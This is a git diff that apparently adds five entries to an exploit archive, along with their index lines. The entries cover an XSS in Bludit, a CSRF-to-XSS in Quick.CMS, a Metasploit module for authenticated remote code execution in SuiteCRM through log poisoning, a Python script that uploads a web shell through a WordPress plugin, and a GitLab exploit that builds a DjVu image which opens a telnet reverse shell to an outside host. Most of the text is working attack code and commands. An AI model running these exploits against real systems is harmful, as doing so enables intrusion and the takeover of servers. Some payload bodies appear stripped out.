diff --git a/exploits/php/webapps/50529.txt b/exploits/php/webapps/50529.txt
new file mode 100644
index 000000000..ef6a63607
--- /dev/null
+++ b/exploits/php/webapps/50529.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
+# Date: 19/10/2021
+# Exploit Author: Vasu (tamilan_mkv)
+# Vendor Homepage: https://www.bludit.com
+# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
+# Version: bludit-3-13-1
+# Tested on: kali linux
+# CVE : CVE-2021-35323
+
+### Steps to reproduce
+
+1. Open login page http://localhost:800/admin/login;
+2. Enter the username place ``admin">
``and enter the password
+3. Trigger the malicious javascript code
\ No newline at end of file
diff --git a/exploits/php/webapps/50530.txt b/exploits/php/webapps/50530.txt
new file mode 100644
index 000000000..003ff61f9
--- /dev/null
+++ b/exploits/php/webapps/50530.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
+# Date: 21/04/2021
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: https://opensolution.org/
+# Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
+# Version: 6.7
+# Tested on: Windows 8.1, Kali Linux, Burp Suite
+
+Steps to Reproduce:
+
+1. At first login to your panel
+2. then click the "Sliders" menu to "New Slider"
+3. now intercept with the burp suite and save a new slider
+4. Then use XSS payload in sDescription value.
+5. Now Generate a CSRF POC
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50531.rb b/exploits/php/webapps/50531.rb
new file mode 100755
index 000000000..d61456331
--- /dev/null
+++ b/exploits/php/webapps/50531.rb
@@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::CmdStager
+ include Msf::Exploit::FileDropper
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'SuiteCRM Log File Remote Code Execution',
+ 'Description' => %q{
+ This module exploits an input validation error on the log file extension parameter. It does
+ not properly validate upper/lower case characters. Once this occurs, the application log file
+ will be treated as a php file. The log file can then be populated with php code by changing the
+ username of a valid user, as this info is logged. The php code in the file can then be executed
+ by sending an HTTP request to the log file. A similar issue was reported by the same researcher
+ where a blank file extension could be supplied and the extension could be provided in the file
+ name. This exploit will work on those versions as well, and those references are included.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'M. Cory Billington' # @_th3y
+ ],
+ 'References' => [
+ ['CVE', '2021-42840'],
+ ['CVE', '2020-28328'], # First CVE
+ ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
+ ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
+ ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
+ ],
+ 'Platform' => %w[linux unix],
+ 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
+ 'Targets' => [
+ [
+ 'Linux (x64)', {
+ 'Arch' => ARCH_X64,
+ 'Platform' => 'linux',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+ }
+ }
+ ],
+ [
+ 'Linux (cmd)', {
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_bash'
+ }
+ }
+ ]
+ ],
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+ 'Reliability' => [REPEATABLE_SESSION]
+ },
+ 'Privileged' => true,
+ 'DisclosureDate' => '2021-04-28',
+ 'DefaultTarget' => 0
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
+ OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
+ OptString.new('PASS', [true, 'Password for administrator', 'admin']),
+ OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),
+ OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
+ OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
+ ]
+ )
+ end
+
+ def check
+ authenticate unless @authenticated
+ return Exploit::CheckCode::Unknown unless @authenticated
+
+ version_check_request = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'keep_cookies' => true,
+ 'vars_get' => {
+ 'module' => 'Home',
+ 'action' => 'About'
+ }
+ }
+ )
+
+ return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request
+
+ version_match = version_check_request.body[/
+ Version
+ \s
+ \d{1} # Major revision
+ \.
+ \d{1,2} # Minor revision
+ \.
+ \d{1,2} # Bug fix release
+ /x]
+
+ version = version_match.partition(' ').last
+
+ if version.nil? || version.empty?
+ about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
+ return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
+ end
+
+ patched_version = Rex::Version.new('7.11.18')
+ current_version = Rex::Version.new(version)
+
+ return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version
+
+ Exploit::CheckCode::Safe("SuiteCRM #{version}")
+ end
+
+ def authenticate
+ print_status("Authenticating as #{datastore['USER']}")
+ initial_req = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'keep_cookies' => true,
+ 'vars_get' => {
+ 'module' => 'Users',
+ 'action' => 'Login'
+ }
+ }
+ )
+
+ return false unless initial_req && initial_req.code == 200
+
+ login = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'keep_cookies' => true,
+ 'vars_post' => {
+ 'module' => 'Users',
+ 'action' => 'Authenticate',
+ 'return_module' => 'Users',
+ 'return_action' => 'Login',
+ 'user_name' => datastore['USER'],
+ 'username_password' => datastore['PASS'],
+ 'Login' => 'Log In'
+ }
+ }
+ )
+
+ return false unless login && login.code == 302
+
+ res = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'keep_cookies' => true,
+ 'vars_get' => {
+ 'module' => 'Administration',
+ 'action' => 'index'
+ }
+ }
+ )
+
+ auth_succeeded?(res)
+ end
+
+ def auth_succeeded?(res)
+ return false unless res
+
+ if res.code == 200
+ print_good("Authenticated as: #{datastore['USER']}")
+ if res.body.include?('Unauthorized access to administration.')
+ print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
+ @is_admin = false
+ else
+ print_good("#{datastore['USER']} has administrative rights.")
+ @is_admin = true
+ end
+ @authenticated = true
+ return true
+ else
+ print_error("Failed to authenticate as: #{datastore['USER']}")
+ return false
+ end
+ end
+
+ def post_log_file(data)
+ send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'keep_cookies' => true,
+ 'headers' => {
+ 'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
+ },
+ 'data' => data.to_s
+ }
+ )
+ end
+
+ def modify_system_settings_file
+ filename = rand_text_alphanumeric(8).to_s
+ extension = '.pHp'
+ @php_fname = filename + extension
+ action = 'Modify system settings file'
+ print_status("Trying - #{action}")
+
+ data = Rex::MIME::Message.new
+ data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+ data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+ data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')
+ data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')
+ data.add_part('info', nil, nil, 'form-data; name="logger_level"')
+ data.add_part('Save', nil, nil, 'form-data; name="save"')
+
+ res = post_log_file(data)
+ check_logfile_request(res, action)
+ end
+
+ def poison_log_file
+ action = 'Poison log file'
+ if target.arch.first == 'cmd'
+ command_injection = ""
+ else
+ @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"
+ command_injection = %(
+
+ )
+ end
+
+ print_status("Trying - #{action}")
+
+ data = Rex::MIME::Message.new
+ data.add_part('Users', nil, nil, 'form-data; name="module"')
+ data.add_part('1', nil, nil, 'form-data; name="record"')
+ data.add_part('Save', nil, nil, 'form-data; name="action"')
+ data.add_part('EditView', nil, nil, 'form-data; name="page"')
+ data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
+ data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
+ data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')
+
+ res = post_log_file(data)
+ check_logfile_request(res, action)
+ end
+
+ def restore
+ action = 'Restore logging to default configuration'
+ print_status("Trying - #{action}")
+
+ data = Rex::MIME::Message.new
+ data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+ data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+ data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
+ data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
+ data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
+ data.add_part('Save', nil, nil, 'form-data; name="save"')
+
+ post_log_file(data)
+
+ data = Rex::MIME::Message.new
+ data.add_part('Users', nil, nil, 'form-data; name="module"')
+ data.add_part('1', nil, nil, 'form-data; name="record"')
+ data.add_part('Save', nil, nil, 'form-data; name="action"')
+ data.add_part('EditView', nil, nil, 'form-data; name="page"')
+ data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
+ data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
+ data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')
+
+ res = post_log_file(data)
+
+ print_error("Failed - #{action}") unless res && res.code == 301
+
+ print_good("Succeeded - #{action}")
+ end
+
+ def check_logfile_request(res, action)
+ fail_with(Failure::Unknown, "#{action} - no reply") unless res
+
+ unless res.code == 301
+ print_error("Failed - #{action}")
+ fail_with(Failure::UnexpectedReply, "Failed - #{action}")
+ end
+
+ print_good("Succeeded - #{action}")
+ end
+
+ def execute_php
+ print_status("Executing php code in log file: #{@php_fname}")
+ res = send_request_cgi(
+ {
+ 'uri' => normalize_uri(target_uri, @php_fname),
+ 'keep_cookies' => true
+ }
+ )
+ fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
+ register_files_for_cleanup(@php_fname)
+ register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?
+ end
+
+ def on_request_uri(cli, _request)
+ send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
+ print_good("#{peer} - Payload sent!")
+ end
+
+ def start_http_server
+ start_service(
+ {
+ 'Uri' => {
+ 'Proc' => proc do |cli, req|
+ on_request_uri(cli, req)
+ end,
+ 'Path' => resource_uri
+ }
+ }
+ )
+ @download_url = get_uri
+ end
+
+ def exploit
+ start_http_server
+ authenticate unless @authenticated
+ fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
+ fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
+ modify_system_settings_file
+ poison_log_file
+ execute_php
+ ensure
+ restore if datastore['RESTORECONF']
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/50533.py b/exploits/php/webapps/50533.py
new file mode 100755
index 000000000..7de3182b1
--- /dev/null
+++ b/exploits/php/webapps/50533.py
@@ -0,0 +1,84 @@
+# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
+# Google Dork: inurl: /wp-content/plugins/smart-product-review/
+# Date: 16/11/2021
+# Exploit Author: Keyvan Hardani
+# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
+# Version: <= 1.0.4
+# Tested on: Kali Linux
+
+import os.path
+from os import path
+import json
+import requests;
+import time
+import sys
+
+def banner():
+ animation = "|/-\\"
+ for i in range(20):
+ time.sleep(0.1)
+ sys.stdout.write("\r" + animation[i % len(animation)])
+ sys.stdout.flush()
+ #do something
+ print("Smart Product Review 1.0.4 - Arbitrary File Upload")
+ print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")
+
+def usage():
+ print("Usage: python3 exploit.py [target url] [your shell]")
+ print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
+
+def vuln_check(uri):
+ response = requests.get(uri)
+ raw = response.text
+
+ if ("No script kiddies please!!" in raw):
+ return False;
+ else:
+ return True;
+
+def main():
+
+ banner()
+ if(len(sys.argv) != 3):
+ usage();
+ sys.exit(1);
+
+ base = sys.argv[1]
+ file_path = sys.argv[2]
+
+ ajax_action = 'sprw_file_upload_action'
+ admin = '/wp-admin/admin-ajax.php';
+
+ uri = base + admin + '?action=' + ajax_action ;
+ check = vuln_check(uri);
+
+ if(check == False):
+ print("(*) Target not vulnerable!");
+ sys.exit(1)
+
+ if( path.isfile(file_path) == False):
+ print("(*) Invalid file!")
+ sys.exit(1)
+
+ files = {'files[]' : open(file_path)}
+ data = {
+ "allowedExtensions[0]" : "jpg",
+ "allowedExtensions[1]" : "php4",
+ "allowedExtensions[2]" : "phtml",
+ "allowedExtensions[3]" : "png",
+ "qqfile" : "files",
+ "element_id" : "6837",
+ "sizeLimit" : "12000000",
+ "file_uploader_nonce" : "2b102311b7"
+ }
+ print("Uploading Shell...");
+ response = requests.post(uri, files=files, data=data )
+ file_name = path.basename(file_path)
+ if("ok" in response.text):
+ print("Shell Uploaded!")
+ print("Shell URL on your Review/Comment");
+ else:
+ print("Shell Upload Failed")
+ sys.exit(1)
+
+main();
\ No newline at end of file
diff --git a/exploits/ruby/webapps/50532.txt b/exploits/ruby/webapps/50532.txt
new file mode 100644
index 000000000..403b325bc
--- /dev/null
+++ b/exploits/ruby/webapps/50532.txt
@@ -0,0 +1,38 @@
+# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
+# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22
+# Date: 11/01/2021
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://about.gitlab.com/
+# Software Link: https://gitlab.com/gitlab-org/gitlab
+# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
+# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
+# CVE : CVE-2021-22205
+# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/
+# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed
+
+Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.
+
+1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.
+
+echo -e
+"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="
+| base64 -d > lol.jpg
+echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
+echo -n
+"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="
+| base64 -d >> lol.jpg
+
+2. Sending the payload. Any random endpoint will do.
+
+curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)
+
+2a. Sample Output from the reverse shell:
+
+$ nc -lnvp 1270
+Listening on [0.0.0.0] (family 0, port 1270)
+Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport
+34836)
+whoami
+git
+id
+uid=998(git) gid=998(git) groups=998(git)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 08c610881..f0f6b34a9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44624,3 +44624,8 @@ id,file,description,date,author,type,platform,port
50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
50526,exploits/php/webapps/50526.py,"Online Learning System 2.0 - Remote Code Execution (RCE)",1970-01-01,djebbaranon,webapps,php,
50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,multiple,
+50529,exploits/php/webapps/50529.txt,"Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)",1970-01-01,Vasu,webapps,php,
+50530,exploits/php/webapps/50530.txt,"Quick.CMS 6.7 - Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
+50531,exploits/php/webapps/50531.rb,"SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"M. Cory Billington",webapps,php,
+50532,exploits/ruby/webapps/50532.txt,"GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jacob Baines",webapps,ruby,
+50533,exploits/php/webapps/50533.py,"Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload",1970-01-01,"Keyvan Hardani",webapps,php,